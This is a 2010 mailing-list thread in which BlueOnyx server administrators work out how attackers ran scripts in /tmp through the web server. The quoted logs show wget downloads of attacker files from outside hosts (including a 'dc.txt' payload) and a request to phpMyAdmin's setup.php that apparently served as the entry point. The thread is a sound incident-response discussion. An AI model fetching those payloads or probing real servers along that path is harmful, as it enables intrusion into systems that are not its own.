[BlueOnyx:05938] Re: hacker scripts

Gerald Waugh gwaugh at frontstreetnetworks.com
Mon Nov 29 13:07:34 -05 2010 

On Mon, 2010-11-29 at 09:44 -0800, Ken - Precision Web Hosting, Inc
wrote:
> ----- Original Message ----- 
> From: "Gerald Waugh" <gwaugh at frontstreetnetworks.com>
> To: "BlueOnyx General Mailing List" <blueonyx at blueonyx.it>
> Sent: Monday, November 29, 2010 9:28 AM
> Subject: [BlueOnyx:05934] Re: hacker scripts
> 
> 
> >
> > On Mon, 2010-11-29 at 11:23 -0600, Gerald Waugh wrote:
> >> On Mon, 2010-11-29 at 17:17 +0000, Steve Howes wrote:
> >> > On 29 Nov 2010, at 17:08, Gerald Waugh wrote:
> >> > > How can I stop these people from downloading and running their 
> >> > > scripts
> >> > > in /tmp using httpd
> >> >
> >> > You need to find out how they did it. You're either hosting someone 
> >> > naughty, or someone who has an insecure script. Who owns the files?
> >> >
> >>   apache.apache
> >>
> >> The server has a site with Drupal and some other blog stuff
> >>
> >
> > /tmp type ext3 (rw,noexec,nosuid)
> >
> >
> >
> > [Mon Nov 29 05:50:25 2010] [error] [client 208.80.194.26] File does not
> > exist:
> > /home/.sites/132/site96/web/trio.htm&h=300&w=305&sz=49&hl=en&start=526
> > --06:02:38--  http://193.136.136.86/quixplorer/readme.txt
> >           => `readme.txt'
> > Connecting to 193.136.136.86:80... connected.
> > HTTP request sent, awaiting response... 200 OK
> > Length: 27,931 (27K) [text/plain]
> >
> >    0K .......... .......... .......                         100%
> > 56.99
> > KB/s
> >
> > 06:02:39 (56.99 KB/s) - `readme.txt' saved [27931/27931]
> >
> > --06:02:39--  http://realezsites.com/pers/cowtipper524/dc.txt
> >           => `dc.txt'
> > Resolving realezsites.com... 64.235.52.10
> > Connecting to realezsites.com|64.235.52.10|:80... connected.
> > HTTP request sent, awaiting response... 200 OK
> > Length: 2,140 (2.1K) [text/plain]
> >
> >    0K ..                                                    100%
> > 2.40
> > MB/s
> >
> > 06:02:39 (2.40 MB/s) - `dc.txt' saved [2140/2140]
> >
> > -- 
> > Gerald
> >
> 
> 
> Look at the time the files in the /tmp were created. Then look in your 
> access logs and see what site / php script was accessed at that time.
> 
> Check your drupal version and search on Google for
> "Exploits for Drupal version xxx"
> 

[29/Nov/2010:06:02:37 -0600] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 200 14061 "http://208.67.252.235/phpmyadmin/scripts/setup.php" "Opera"

looks like its the phpmyadmin thing, I will have to find and move it...

More information about the Blueonyx mailing list